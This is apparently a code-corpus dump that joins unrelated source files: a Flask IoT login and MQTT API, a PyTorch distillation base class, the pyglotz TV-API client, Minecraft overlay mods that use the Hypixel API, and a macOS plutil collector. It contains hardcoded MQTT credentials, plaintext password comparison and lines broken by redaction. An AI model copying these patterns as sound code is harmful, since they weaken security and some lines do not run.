new_user = User.register(json_data)
send_verification_mail(
new_user.email, new_user.get_verification_token())
return jsonify({
"status": "success",
"message": "Check your email to activate your aacount",
"user": user_schema.dump(new_user)
}), 201
except ValidationError as e:
return jsonify({
"status": "failed",
"messages": e.messages
}), 400
except NotUniqueError as e:
# TODO: this is a tricky way to identify the path that raised the duplicate error
# by searching in the error message
mongo_error_message = str(e)
filed = "username" \
if re.search("username", mongo_error_message) \
else "email"
# for consistency structure the error as the marshamello-validaton-errors
e = {
"status": "validatoin failed",
"messages": {
filed: [
"this {} is already registered".format(filed)]
}
}
return jsonify(e), 400
@app.route("/api/v1/verify", methods=["GET"])
def verify_email():
token = request.args.get("token")
try:
User.verify_account(token)
return jsonify({
"status": "success",
"message": "Account has been activated"
})
except Exception as e:
print(e)
return jsonify({
"status": "account activation failed",
"message": "Invalid or expired link"
}), 403
@app.route("/api/v1/login", methods=["POST"])
def jwt_login():
email = request.json.get("email", None)
password = request.json.get("password", None)
error_messages = {}
if not email:
error_messages["email"] = ["required field"]
if not password:
error_messages["password"] = ["required field"]
if error_messages:
return jsonify({
"status": "validation failed",
"messages": error_messages
}), 400
user = User.get_by_email(email)
if not (user and user.check_password(password)):
res = {
"status": "login failed",
"message": "email or password is woring"
}
return jsonify(res), 401
if not user.verified:
return jsonify({
"status": "login failed",
"message": "Confirm your account. Follow instruction sent to your email"
}), 400
token = user.generate_token()
res = {
"status": "success",
"token": token,
"user": UserSchema().dump(user)
}
return jsonify(res)
@app.route("/api/v1/logout", methods=["POST"])
@jwt_required
def revoke_token():
jti = get_raw_jwt()["jti"]
RevokedToken.add(jti)
return jsonify({
"status": "success",
"message": "successuflly logged out"
}), 200
```
#### File: app/API/utils.py
```python
import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish
import paho.mqtt.subscribe as subscribe
from flask import current_app as app
MQTT_USERNAME = "admin"
MQTT_PWD = "<PASSWORD>"
MQTT_ID = "SERVERADMIN"
def set_switch_state(device, state):
"""Publish 0 to MQTT broker
:@state: '0' or '1'
:@return: Ture if operation successed
"""
mqtt_seetings = app.config["MQTT_SETTINGS"]
hostname = mqtt_seetings["host"]
port = mqtt_seetings["port"]
try:
publish.single(device.topic, payload=state, qos=1, retain=True,\
hostname=hostname, port=1883, client_id=MQTT_ID, \
keepalive=5, will=None,auth = {'username':MQTT_USERNAME,\
'password':<PASSWORD>}, tls=None, protocol=mqtt.MQTTv311, transport="tcp")
return True
except Exception as error:
print("MQTT failed", error)
return False
def read_sensor(device):
mqtt_seetings = app.config["MQTT_SETTINGS"]
hostname = mqtt_seetings["host"]
port = mqtt_seetings["port"]
try:
val = publish.single(device.topic, qos=1,\
hostname=hostname, port=1883, client_id=MQTT_ID, \
keepalive=5, will=None,auth = {'username':MQTT_USERNAME,\
'password':<PASSWORD>}, tls=None, protocol=mqtt.MQTTv311, transport="tcp")
return val
except Exception as error:
print("MQTT failed", error)
return None
def validate_user_mqtt(user, username, password):
if user.mqtt_username == username and user.mqtt_password == password:
return True
return False
def is_mqtt_admin(username, password):
if username == MQTT_USERNAME and password == <PASSWORD>_PWD:
return True
return False
```
#### File: src/app/models.py
```python
import secrets
import jwt
from time import time
from app import app
from app import db
from app.commons import APP_NAME
from app.API.utils import set_switch_state
from mongoengine.errors import NotUniqueError, ValidationError
from flask_jwt_extended import create_access_token
from werkzeug.security import generate_password_hash, check_password_hash
class RevokedToken(db.Document):
jti = db.StringField(unique=True)
@classmethod
def is_blacklisted(cls, jti):
return cls.objects(jti=jti).first() != None
@classmethod
def add(cls, jti):
return cls(jti=jti).save()
class User(db.Document):
email = db.EmailField(max_length=50, unique=True)
username = db.StringField(max_length=50, unique=True)
password_hash = db.StringField(max_length=128)
verified = db.BooleanField(default=False)
mqtt_username = db.StringField(max_length=128)
mqtt_password = db.StringField(max_length=128)
topics = db.ListField(db.StringField())
meta = {'auto_create_index':False}
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def validate_mqtt(self, mqtt_username, mqtt_password):
if self.mqtt_username == mqtt_username and \
self.mqtt_password == mqtt_password:
return True
def has_topic(self, topic):
return topic in self.topics
def generate_token(self):
token = create_access_token(identity={
"username": self.username,
"id": str(self.id)
})
return token
def get_verification_token(self, expires_in=12*60*60*1000):
return jwt.encode({
"email": self.email,
"exp": time() + expires_in
},
app.config['SECRET_KEY'],
algorithm='HS256'
)
@classmethod
def verify_account(cls, token):
email = None
try:
email = jwt.decode(token, app.config["SECRET_KEY"])["email"]
user = cls.get_by_email(email)
if not user:
raise jwt.InvalidTokenError()
user.verified = True
user.save()
return True
except jwt.ExpiredSignatureError as er:
# print(er)
return
@classmethod
def register(cls, form):
username = form.get("username")
email = form.get("email")
password = form.get("password")
new_user = cls(username=username, email=email)
new_user.set_password(password)
new_user.save()
return new_user
@classmethod
def get_by_email(cls, email):
return cls.objects(email=email).first()
@classmethod
def get_by_username(cls, username):
return cls.objects(username=username).first()
@classmethod
def get_by_id(cls, id):
return cls.objects(id=id).first()
@classmethod
def get_by_mqtt_username(cls, mqtt_username):
return cls.objects(mqtt_username=mqtt_username).first()
def __repr__(self):
return "<User {}>".format(self.username)
class Device(db.Document):
TYPES = {'switch': 1,
'sensor': 2}
key = db.StringField(
unique=True, default=lambda: secrets.token_urlsafe(10))
owner = db.ReferenceField(
User, required=True, reverse_delete_rule="cascade")
port = db.IntField(requiered=True)
name = db.StringField(max_length=50, required=True)
place = db.StringField(max_length=50, required=True)
d_type = db.StringField(choices=("switch", "sensor"), required=True)
topic = db.StringField(unique=True)
def save(self, force_insert=False, validate=True, clean=True, write_concern=None, cascade=None, cascade_kwargs=None,
_refs=None, save_condition=None, signal_kwargs=None, **kwargs):
# TODO: elimnate the mqtt dependency by using a queue or smth
self.topic = self._generate_topic()
# tell the broker to set the switch to 0
flag = True
if self.d_type == "switch":
flag = set_switch_state(self, "0")
if not flag:
raise Exception("MQTT Failure")
# update user topics
self.owner.topics.append(self.topic)
self.owner.save()
return super().save(force_insert, validate, clean, write_concern, cascade, cascade_kwargs, _refs,
save_condition, signal_kwargs, **kwargs)
def delete(self, signal_kwargs=None, **write_concern):
self.owner.topics.remove(self.topic)
self.owner.save()
return super().delete(signal_kwargs, **write_concern)
def _generate_topic(self):
_TOPIC_TEMP = APP_NAME + "/{username}/{key}/{d_type}/{port}"
return _TOPIC_TEMP.format(username=self.owner.username, key=self.key, d_type=self.d_type, port=self.port)
def serialize(self):
return {
"key": self.key,
"user_id": str(self.owner.id),
"name": self.name,
"place": self.place,
"type": self.d_type,
"port": self.port,
"topic": self.topic
}
@classmethod
def by_owner(cls, owner):
return cls.objects(owner=owner).all()
@classmethod
def by_key(cls, key):
return cls.objects(key=key).first()
def __repr__(self):
return "<Device> {}".format(self.name)
``` |
{
"source": "3outeille/knowledgeDistillation",
"score": 2
} |
#### File: knowledgeDistillation/distillation/baseDistiller.py
```python
import torch
import torch.nn as nn
from distillation.utils import Logger, AverageMeter, Accuracy
from datetime import datetime
import os
class BaseDistiller(nn.Module):
def __init__(self):
super(BaseDistiller, self).__init__()
self.currentTime = datetime.now().strftime("%Y%m%d-%H%M%S")
def _setHook(self, hook, model, layer):
"""
Set hook for distillation on provided model and layer.
"""
hook.setHook(self._getLayer(model, layer))
def _getLayer(self, model, layer):
"""
Fetch layer from model.
:param layer: int or str; layer position or layer name for backbone model, to use as distillation layer
"""
if type(layer) == str:
modules = dict([*model.named_modules()])
return modules.get(layer, None)
elif type(layer) == int:
children = [*model.children()]
return children[layer]
else:
raise NameError(f'Hidden layer ({layer}) not found in model!')
def print_epoch(self, epoch, epochs, metrics):
"""
Print training metrics for epoch.
"""
template = f'Epoch: {epoch:3}/{epochs}'
for name, metric in metrics.items():
template += f'\t {name}: {metric:3.3f}'
print(template)
def load_state(self, checkpoint, student=None, teacher=None, optimizer=None):
"""
Load checkpoint if provided and return epoch to start on.
"""
startEpoch = 1
if checkpoint:
if os.path.isfile(checkpoint):
device = next(student.parameters()).device
state = torch.load(checkpoint, map_location=device)
startEpoch = state['epoch']
if student is not None:
student.load_state_dict(state['student'])
if teacher is not None:
teacher.load_state_dict(state['teacher'])
if optimizer is not None:
optimizer.load_state_dict(state['optimizer'])
return startEpoch
def init_tensorboard_logger(self, subDirectory=None):
self.logDir = os.path.join('logs', '' if subDirectory is None else subDirectory, self.currentTime)
self.logger = Logger(self.logDir)
def log(self, epoch, metrics):
"""
Log performance metrics to tensorboard.
:param epoch: int, current training epoch
:param metrics: dict, name and metric
"""
for name, metric in metrics.items():
self.logger.add_scalar(name, metric, epoch)
self.logger.flush()
def save(self, epoch, student, teacher, optimizer, subDirectory=None):
"""
Save checkpoint of model.
"""
self.checkpointDir = os.path.join('checkpoint', '' if subDirectory is None else subDirectory, self.currentTime)
os.makedirs(self.checkpointDir, exist_ok=True)
torch.save({'epoch': epoch,
'student': student.state_dict(),
'teacher': teacher.state_dict(),
'optimizer': optimizer.state_dict()},
os.path.join(self.checkpointDir, 'checkpoint.pt'))
def validate(self, student, dataloader, objective, OneHot=False):
"""
Validate student model on all data in dataloader.
:return: dict, named metrics for logging.
"""
student.eval()
device = next(student.parameters()).device
accuracy = Accuracy(OH=OneHot)
lossMeter = AverageMeter()
accMeter = AverageMeter()
for _, (data, target) in enumerate(dataloader):
data, target = data.to(device), target.to(device)
with torch.no_grad():
# Calculate logits
sLogits = student(data)
# Calculate loss
batchLoss = objective(nn.functional.log_softmax(sLogits, dim=1), target)
# Save metrics
lossMeter.update(batchLoss.item(), n=len(data))
accMeter.update(accuracy(nn.functional.softmax(sLogits, dim=1), target), n=len(data))
return {'Valid/Loss': lossMeter.avg,
'Valid/Accuracy': accMeter.avg}
``` |
{
"source": "3OW/pyglotz",
"score": 2
} |
#### File: pyglotz/pyglotz/glotz.py
```python
from __future__ import unicode_literals
import re
import requests
from requests.adapters import HTTPAdapter
from requests.utils import requote_uri
from urllib3.util.retry import Retry
from pyglotz import endpoints
from pyglotz.exceptions import (ActorNotFound, BadRequest, BannersNotFound, ConnectionError, EpisodeNotFound,
IDNotFound, MissingParameters, ShowIndexError, ShowNotFound)
class Show(object):
def __init__(self, data):
self.id = data.get('Series').get('id')
# actors = str.split(data.get('Series').get('Actors'),'|')[1:-1]
self.actors = data.get('Series').get('Actors')
self.airs_day_of_week = data.get('Series').get('Airs_DayOfWeek')
self.airs_time = data.get('Series').get('Airs_Time')
self.content_rating = data.get('Series').get('ContentRating')
self.first_aired = data.get('Series').get('FirstAired')
self.genre = data.get('Series').get('Genre')
self.imdb_id = data.get('Series').get('IMDB_ID')
self.language = data.get('Series').get('Language')
self.network = data.get('Series').get('Network')
self.network_id = data.get('Series').get('NetworkID')
self.overview = data.get('Series').get('Overview')
self.rating = data.get('Series').get('Rating')
self.rating_count = data.get('Series').get('RatingCount')
self.runtime = data.get('Series').get('Runtime')
self.series_id = data.get('Series').get('SeriesID')
self.series_name = data.get('Series').get('SeriesName')
self.status = data.get('Series').get('Status')
self.added = data.get('Series').get('added')
self.added_by = data.get('Series').get('addedBy')
self.banner = data.get('Series').get('banner')
self.fan_art = data.get('Series').get('fanart')
self.last_updated = data.get('Series').get('lastupdated')
self.poster = data.get('Series').get('poster')
self.zap2it_id = data.get('Series').get('zap2it_id')
self.slug = data.get('Series').get('slug')
self.tvrage_id = data.get('Series').get('tvrage_id')
self.year = data.get('Series').get('year')
self.episodes = list()
if data.get('Episode'):
for ep in data.get('Episode'):
self.episodes.append(Episode(ep))
self.aliases = list()
def __repr__(self):
if self.year:
year = str(self.year)
elif self.first_aired:
year = str(self.first_aired[:4])
else:
year = None
return _valid_encoding('<Show(id={id},name={name},year={year})>'.format(
id=self.id,
name=self.series_name,
year=year)
)
def __str__(self):
return _valid_encoding(self.series_name)
def __unicode__(self):
return self.series_name
# Python 3 bool evaluation
def __bool__(self):
return bool(self.id)
def __getitem__(self, item):
try:
return self.episodes[item]
except KeyError:
raise EpisodeNotFound('Episode {0} does not exist for show {1}.'.format(item, self.series_name))
class Episode(object):
def __init__(self, data):
self.id = data.get('id')
self.imdb_id = data.get('IMDB_ID')
self.combined_episodenumber = data.get('Combined_episodenumber')
self.combined_season = data.get('Combined_season')
self.cvd_chapter = data.get('DVD_chapter')
self.dvd_discid = data.get('DVD_discid')
self.dvd_episodenumber = data.get('DVD_episodenumber')
self.dvd_season = data.get('DVD_season')
self.director = data.get('Director')
self.ep_img_flag = data.get('EpImgFlag')
self.episode_name = data.get('EpisodeName')
self.episode_number = data.get('EpisodeNumber')
self.first_aired = data.get('FirstAired')
self.guest_stars = data.get('GuestStars')
self.language = data.get('Language')
self.overview = data.get('Overview')
self.production_code = data.get('ProductionCode')
self.rating = data.get('Rating')
self.rating_count = data.get('RatingCount')
self.season_number = data.get('SeasonNumber')
self.writer = data.get('Writer')
self.absolute_number = data.get('absolute_number')
if self.absolute_number == '':
self.absolute_number = None
self.filename = data.get('filename')
self.last_updated = data.get('lastupdated')
self.season_id = data.get('seasonid')
self.series_id = data.get('seriesid')
self.thumb_added = data.get('thumb_added')
self.thumb_height = data.get('thumb_height')
self.thumb_width = data.get('thumb_width')
def __repr__(self):
return '<Episode(season={season},episode_number={number})>'.format(
season=str(self.season_number).zfill(2),
number=str(self.episode_number).zfill(2)
)
def __str__(self):
season = 'S' + str(self.season_number).zfill(2)
episode = 'E' + str(self.episode_number).zfill(2)
return _valid_encoding(season + episode + ' ' + self.episode_name)
def is_special(self):
if self.season_number == '0':
return True
return False
def _valid_encoding(text):
if not text:
return
return text
def _url_quote(show):
return requote_uri(show)
def _remove_tags(text):
if not text:
return None
return re.sub(r'<.*?>', '', text)
class Actor(object):
def __init__(self, data):
self.id = data.get('id')
self.name = data.get('Name')
self.image = data.get('Image')
self.role = data.get('Role')
self.sort_order = data.get('SortOrder')
def __repr__(self):
return _valid_encoding('<Character(name={name},id={id})>'.format(
name=self.name,
id=self.id
))
def __str__(self):
return _valid_encoding(self.name)
def __unicode__(self):
return self.name
class Banner(object):
def __init__(self, data):
self.id = data.get('id')
self.banner_path = data.get('BannerPath')
self.banner_type = data.get('BannerType')
self.banner_type2 = data.get('BannerType2')
self.colors = data.get('Colors')
self.series_name = data.get('SeriesName')
self.thumbnail_path = data.get('ThumbnailPath')
self.vignette_path = data.get('VignettePath')
self.language = data.get('Language')
self.season = data.get('Season')
self.rating = data.get('Rating')
self.rating_count = data.get('RatingCount')
def __repr__(self):
return _valid_encoding('<Character(banner_type={banner_type},id={id})>'.format(
banner_type=self.banner_type,
id=self.id
))
def __str__(self):
return _valid_encoding(self.id)
def __unicode__(self):
return self.id
class Glotz(object):
"""This is the main class of the module enabling interaction with the Glotz API.
Attributes:
api_key (str): Glotz api key. Find your key at https://www.glotz.info/profile
"""
def __init__(self, api_key=None, session=None):
self.api_key = api_key
self.session = session or requests.Session()
self.session.headers.setdefault('user-agent', 'glotz_api/{}.{}.{}'.format(1, 0, 0))
# Query Glotz endpoints
def _endpoint_get(self, url):
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[429])
self.session.mount('https://', HTTPAdapter(max_retries=retries))
try:
r = self.session.get(url)
except requests.exceptions.ConnectionError as e:
raise ConnectionError(repr(e))
if r.status_code in [404, 422]:
return None
if r.status_code == 400:
raise BadRequest('Bad Request for url {}'.format(url))
results = r.json()
return results
# Get Show object by tvdb_id
# TODO extend by additional qualifiers
def get_show(self, tvdb_id=None, language=None):
"""Get Show object directly via id.
Args:
tvdb_id: Show tvdb_id
language: Show information language
"""
if not tvdb_id:
raise MissingParameters(
'tvdb_id required to get show, none provided,')
if tvdb_id:
if not language:
language = 'de'
try:
return self.lookup_tvdb(tvdb_id, language)
except IDNotFound:
raise IDNotFound('Show with ID {0} not found'.format(tvdb_id))
# Return list of Show objects
def get_show_list(self, show_name, language=None):
"""Return list of Show objects from the Glotz "Show Search" endpoint.
:param show_name: Name of show
:param language: Language of the show
:return: List of Show(s)
"""
if not language:
language = 'de'
shows = self.show_search(show_name, language)
return shows
def show_search(self, show, language=None):
_show = _url_quote(show)
if not language:
language = 'de'
url = endpoints.show_search.format(_show, language)
q = self._endpoint_get(url)
if q and q.get('Data'):
shows = []
for result in q.get('Data').get('Series') if isinstance(q.get('Data').get('Series'),
list) else [q.get('Data').get('Series')]:
show = Show({'Series': result})
shows.append(show)
return shows
else:
raise ShowNotFound('Show {0} not found'.format(show))
# currently not used by Medusa API
def episode_by_id(self, episode_id, language=None):
if not language:
language = 'de'
url = endpoints.episode_by_id.format(self.api_key, episode_id, language)
q = self._endpoint_get(url)
if q and q.get('Data') and q.get('Data').get('Episode') and q.get('Data').get('Episode').get('id') != '0':
return Episode(q.get('Data').get('Episode'))
else:
raise EpisodeNotFound("Couldn't find Episode with ID {0}".format(episode_id))
def lookup_tvdb(self, tvdb_id, language=None):
if not language:
language = 'de'
url = endpoints.lookup_tvdb.format(self.api_key, tvdb_id, language)
q = self._endpoint_get(url)
if q and q.get('Data') and q.get('Data').get('Series') and q.get('Data').get('Series').get('id') != '0':
return Show(q.get('Data'))
else:
raise IDNotFound('TVDB ID {0} not found'.format(tvdb_id))
# Get all aliases of a show
def get_show_aliases(self, tvdb_id):
url = endpoints.show_aliases.format(tvdb_id)
q = self._endpoint_get(url)
if q:
if str(tvdb_id) in q:
embedded = q[str(tvdb_id)]
if embedded:
aliases = list()
for alias in embedded:
aliases.append(alias)
return aliases
else:
return '[]'
# Get all actors of a show
def get_actors_list(self, tvdb_id):
url = endpoints.show_actors.format(self.api_key, tvdb_id)
q = self._endpoint_get(url)
if q and q.get('Actors') != '':
actors = []
for result in q.get('Actors').get('Actor') if isinstance(q.get('Actors').get('Actor'),
list) else [q.get('Actors').get('Actor')]:
actor = Actor(result)
actors.append(actor)
return actors
else:
raise ActorNotFound('Actors for show {0} not found'.format(tvdb_id))
def get_banners(self, tvdb_id):
url = endpoints.show_banners.format(self.api_key, tvdb_id)
q = self._endpoint_get(url)
if q and q.get('Banners') != '':
banners = []
for result in q.get('Banners').get('Banner') if isinstance(q.get('Banners').get('Banner'),
list) else [q.get('Banners').get('Banner')]:
banner = Banner(result)
banners.append(banner)
return banners
else:
raise BannersNotFound('Banners for show {0} not found'.format(tvdb_id))
def get_show_updates(self, timestamp):
url = endpoints.show_updates.format(self.api_key, timestamp)
q = self._endpoint_get(url)
if q:
if q.get('shows'):
return q.get('shows')
else:
return '[]'
else:
raise ShowIndexError('Error getting show updates, www.glotz.info may be down')
``` |
{
"source": "3p0bleedthemoncrip/Tobify-Overlay-Download",
"score": 3
} |
#### File: Mods/Chatpp/Mod.py
```python
class MOD:
def __init__(self, Globals):
""" This adds additional message categories to the player detection algorithm """
# data transfer variables
self.Globals = Globals
self.G = self.Globals
self.ModData = Globals.ModData["Chatpp"]
self.backend = Globals.ui_backend
self.frontend = Globals.ui_frontend
# set mod data
self.ModData.name = "Chatpp"
self.ModData.version = "0.0.1"
self.ModData.config = {
"chat++-hypixel": True,
"chat++-bedwars practice": False,
}
self.ModData.settings = {
"chat++-hypixel": "Optimise for Hypixel", # config name : displayed name
"chat++-bedwars practice": "Optimise for the Bedwars Practice server", # config name : displayed name
}
self.ModData.scopes = {
"init": self.setup, # this is part of the setup for the backend ui
"config-init": self.ModData.config, # this is a dictionary of all config items which the mod uses
"config-settings": self.ModData.name, # this registers the mod for the settings menu
"on-message": self.on_message, # this is called when a chat message appears
}
def setup(self, frontend, backend):
""" This is the mod setup function """
join_fragment = "\n - "
print(
f"{self.ModData.name} {self.ModData.version} has been loaded with scopes:{join_fragment}{join_fragment.join([scope for scope in self.ModData.scopes.keys()])}",
end="\n\n")
self.frontend = frontend
self.backend = backend
def on_message(self, timestamp, message):
""" This processes a message """
# print(f"{timestamp} : '{message}'")
# Hypixel
if self.G.config["chat++-hypixel"]:
pass
# Bedwars practice
ranks = ["[Master]", "[Adept]", "[Trainee]"]
if self.G.config["chat++-bedwars practice"]:
# ranked users
for rank in ranks:
if f"{rank} " in message:
message = message.split(f"{rank} ")[1]
username = message.split(" ")[0]
self.add_user(username)
# void message
if " was hit into the void by " in message:
if message.endswith(" FINAL KILL!"):
username1 = message.split(" ")[0]
username2 = message.split(" ")[-3]
else:
username1, *_, username2 = message.split(" ")
self.add_user(username1)
self.add_user(username2)
# void message
elif message.endswith(" fell into the void."):
username = message.split(" ")[0]
self.add_user(username)
# lives remaining
elif " has " in message and " lives" in message:
username, *_ = message.split(" ")
self.add_user(username)
# elimination
elif " has been eliminated" in message:
username, *_ = message.split(" ")
self.sub_user(username)
# server join message
elif " has joined!" in message:
*_, username, _, _ = message.split(" ")
self.add_user(username)
# server leave message
elif " has left!" in message:
*_, username, _, _ = message.split(" ")
self.sub_user(username)
# game leave message
elif message.endswith(" has left the game!"):
username = message.split(" ")[0]
self.add_user(username)
# game start (connecting to lobby)
elif message.startswith("Connecting to "):
self.G.lobby_players = []
# game start (connection successful)
elif message.startswith("Successfully connected to "):
self.G.lobby_players = []
# sending to lobby
elif message.startswith("Sending you to "):
self.G.lobby_players = []
# remove "at"
elif message == "Join the discord for more info at: ":
self.sub_user("at")
# players in game
elif message.startswith("Players in this game: "):
players = message.split(": ")[-1].split(" ")
for player in players:
self.add_user(player)
# block sumo: gold block
elif message.endswith(" has been on the centre gold block for 5 seconds!"):
username = message.split(" ")[0]
self.add_user(username)
# bedwars
elif message.startswith("BED DESTRUCTION > ") and " was dismantled by " in message:
username = message.split(" ")[-1]
self.add_user(username)
# else:
# for p in self.G.lobby_players:
# if p in message:
# print(f"{timestamp} : '{message}'")
def add_user(self, username):
""" This adds a username to the player list """
if username not in self.G.lobby_players:
self.G.lobby_players.append(username)
def sub_user(self, username):
""" This removes a username from the player list """
if username in self.G.lobby_players:
# remove player
self.G.lobby_players.remove(username)
# run mod actions
self.G.thread_chat_ctx.mod_on_player_leave(username)
```
#### File: Mods/PartyInfo/Mod.py
```python
from functools import lru_cache
class MOD:
def __init__(self, Globals):
""" This is an example mod """
# data transfer variables
self.Globals = Globals
self.G = self.Globals
self.ModData = Globals.ModData["PartyInfo"]
self.backend = Globals.ui_backend
self.frontend = Globals.ui_frontend
# set mod data
self.ModData.name = "PartyInfo"
self.ModData.version = "0.1.0"
self.ModData.config = {
"party-info-active": False,
"party-info-friends": True,
"party-info-guild": True,
"party-info-levex-adjustment": False,
"party-info-text-colour": False,
"party-info-party-colour": True,
}
self.ModData.settings = {
"party-info-active": "Get party info",
"party-info-friends": "Use friend data",
"party-info-guild": "Use guild data",
"party-info-levex-adjustment": "Adjust levex",
"party-info-text-colour": "Custom player colours",
"party-info-party-colour": "Highlight team colour",
}
self.ModData.headings = {
"party-id": "Party",
}
self.ModData.custom_heading_colours = {
"party-id": self.get_table_colour
}
self.ModData.scopes = {
"init": self.setup, # this is part of the setup for the backend ui
# "update-f": self.updatef, # this is part of the main update loop for the frontend ui
"config-init": self.ModData.config, # this is a dictionary of all config items which the mod uses
"config-settings": self.ModData.name, # this registers the mod for the settings menu
"table-headings": self.ModData.headings, # this contains any additional table headings
"table-heading-colours": self.ModData.custom_heading_colours, # this replaces the default colour picker
"on-stat-lookup": self.on_stat_lookup, # this is called when stats have been requested for a player
"order-colour": self.order_colour, # this determines output colour
}
def setup(self, frontend, backend):
""" This is the mod setup function """
join_fragment = "\n - "
print(
f"{self.ModData.name} {self.ModData.version} has been loaded with scopes:{join_fragment}{join_fragment.join([scope for scope in self.ModData.scopes.keys()])}",
end="\n\n")
self.frontend = frontend
self.backend = backend
def on_stat_lookup(self, stat_loop_thread, existing_stats, hypixel_data):
""" This adds additional data to the stats """
# add party data
if self.G.config["party-info-active"]:
# if not in your party
existing_stats["party-id"] = ""
# get the friends
friends = self.get_friends(stat_loop_thread, existing_stats)
# get the guild members
guild_members = self.get_guild_members(stat_loop_thread, existing_stats)
# combine (without duplicates)
related_players = list(set(guild_members + friends))
# store in stats
existing_stats["party-info-related-players"] = related_players
# calculate party levex
party_levex = 0
# check for related player in player stats
players_to_tag = []
taken_tags = []
for i, player_stats in enumerate(self.G.gplayer_stats):
# get the uuid
if player_stats["uuid"] in related_players:
players_to_tag.append(i)
# party tag
if player_stats["party-id"] not in taken_tags:
taken_tags.append(player_stats["party-id"])
# get next available party
next_available_party = 1
while next_available_party in taken_tags:
next_available_party += 1
# if there are players to tag then add them to the party
extra_players = []
if len(players_to_tag) != 0:
# tag all players found
for player_pos in players_to_tag:
# add the tag to any players tagged as being in that player's party
existing_party = self.G.gplayer_stats[player_pos]["party-id"]
if existing_party != 0 and existing_party != "":
for i, player_stats in enumerate(self.G.gplayer_stats):
if player_stats["party-id"] == existing_party:
# tag the player
if player_stats["display-name"].lower() in self.G.config["Party"].lower() or \
player_stats[
"nick-name"].lower() in self.G.config["Party"].lower() or player_stats[
"display-name"].lower() == \
self.G.config["Username"].lower():
# in your party
player_stats["party-id"] = "PARTY"
else:
player_stats["party-id"] = next_available_party
# add to players
extra_players.append(i)
# get the levex
party_levex += player_stats["bw-overall-levex"]
# add tag
if self.G.gplayer_stats[player_pos]["display-name"] in self.G.config["Party"] or \
self.G.gplayer_stats[player_pos]["nick-name"] in \
self.G.config["Party"] or self.G.gplayer_stats[player_pos]["display-name"] == self.G.config[
"Username"]:
# in your party
self.G.gplayer_stats[player_pos]["party-id"] = "PARTY"
else:
self.G.gplayer_stats[player_pos]["party-id"] = next_available_party
# get levex
party_levex += self.G.gplayer_stats[player_pos]["bw-overall-levex"]
# tag the new player
if existing_stats["display-name"].lower() in self.G.config["Party"].lower() or existing_stats[
"nick-name"].lower() in \
self.G.config["Party"].lower() or existing_stats["display-name"].lower() == self.G.config[
"Username"].lower():
# in your party
existing_stats["party-id"] = "PARTY"
else:
existing_stats["party-id"] = next_available_party
# get the new player's levex
party_levex += existing_stats["bw-overall-levex"]
# add to players to tag
players_to_tag += extra_players
players_to_tag = list(set(players_to_tag))
# save new levex
if len(players_to_tag) != 0 and self.G.config["party-info-levex-adjustment"]:
# modify levex
party_levex = int(party_levex / (len(players_to_tag) + 1))
# adjust all players
for player_pos in players_to_tag:
self.G.gplayer_stats[player_pos]["bw-overall-levex"] = party_levex
# adjust new player
existing_stats["bw-overall-levex"] = party_levex
else:
# add an empty tag
existing_stats["party-id"] = ""
# is it me?
if (self.G.config["Username"].lower() == existing_stats["display-name"].lower() or self.G.config["Username"] ==
existing_stats["nick-name"].lower()) and self.G.config["Party"] != "":
existing_stats["party-id"] = "PARTY"
# return the updated stats
return existing_stats
def get_guild_members(self, stat_loop_thread, existing_stats):
""" This returns a list of all guild members of a player """
# should friends be retrieved
if not self.G.config["party-info-guild"]:
return []
# get friends
guild_members = stat_loop_thread.HypixelApiCall(
f"https://api.hypixel.net/guild?key={self.G.config['hypixel_api_key']}&player={existing_stats['uuid']}").json()
# check successful
if guild_members["success"]:
# simplify into a list of guild members
guild_members = self.get_guild_uuids(existing_stats["uuid"], guild_members)
else:
# nothing
guild_members = []
return guild_members
def get_guild_uuids(self, user, guild_data):
""" This returns a list of uuids for the friends of the given user """
# no guild?
if guild_data["guild"] is None:
return []
# get guild members
guild_list = []
for data in guild_data["guild"]["members"]:
if data["uuid"] != user:
guild_list.append(data["uuid"])
return guild_list
def get_friends(self, stat_loop_thread, existing_stats):
""" This returns a list of all friends of a player """
# should friends be retrieved
if not self.G.config["party-info-friends"]:
return []
# get friends
friends = stat_loop_thread.HypixelApiCall(
f"https://api.hypixel.net/friends?key={self.G.config['hypixel_api_key']}&uuid={existing_stats['uuid']}").json()
# check successful
if friends["success"]:
# simplify into a list of friends
friends = self.get_friend_uuids(existing_stats["uuid"], friends)
else:
# nothing
friends = []
return friends
def get_friend_uuids(self, user, friend_data):
""" This returns a list of uuids for the friends of the given user """
friend_list = []
for data in friend_data["records"]:
if data["uuidSender"] == user:
friend_list.append(data["uuidReceiver"])
else:
friend_list.append(data["uuidSender"])
return friend_list
def order_colour(self, num):
""" This determines colour coding """
# should it return a colour
if self.G.config["party-info-text-colour"]:
return self.get_custom_player_colour(num)
else:
return None
@lru_cache(maxsize=32)
def get_custom_player_colour(self, num):
""" This calculates the player colour """
# team colours
if num == "PARTY":
# gold
return "#C9BE0B"
elif num == 1:
# red
return "#FF5733"
elif num == 2:
# blue
return "#334DFF"
elif num == 3:
# green
return "#34FF33"
elif num == 4:
# yellow
return "#F4FF33"
elif num == 5:
# aqua
return "#33FFFE"
elif num == 6:
# white
return "#FFFFFF"
elif num == 7:
# pink
return "#FD33FF"
elif num == 8:
# gray
return "#616161"
else:
# purple
return "#9A69F9"
def get_table_colour(self, pos):
""" This returns the colour for the player in the table at the position given """
return self.get_custom_player_colour(self.frontend.player_stats[pos]["party-id"])
``` |
{
"source": "3Peso/mosk",
"score": 2
} |
#### File: artefact/localhost/tools.py
```python
__author__ = '3Peso'
from os import path
from baseclasses.artefact import MacArtefact
from businesslogic.support import run_terminal_command
from businesslogic.errors import CollectorParameterError
from baseclasses.artefact import FileClass, ToolClass
class PLUtil(MacArtefact, FileClass, ToolClass):
"""Uses the tool 'PLUtil' to collect information from plist files.
This is a macOS specific tool.
"""
def __init__(self, *args, **kwargs) -> None:
self._tool_path = ""
self._default_tool = "plutil" # The _default_tool attribute is used inside ToolClass
super().__init__(*args, **kwargs)
def _collect(self) -> None:
try:
if not path.exists(self.source_path):
self.data = f"File '{self.source_path}' does not exist."
return
except AttributeError:
raise(CollectorParameterError("No 'filepath' parameter provided."))
plutil_path = self.tool_path
self.data = run_terminal_command([plutil_path, '-p', self.source_path])
self.data[-1].sourcepath = self.source_path
if plutil_path == 'plutil':
self.data = \
"WARNING: No own copy of 'PLUtil' provided. 'PLUtil' of the live artefact has been used."
```
#### File: artefact/network/internet.py
```python
__author__ = '3Peso'
import http.client
import json
import logging
import re
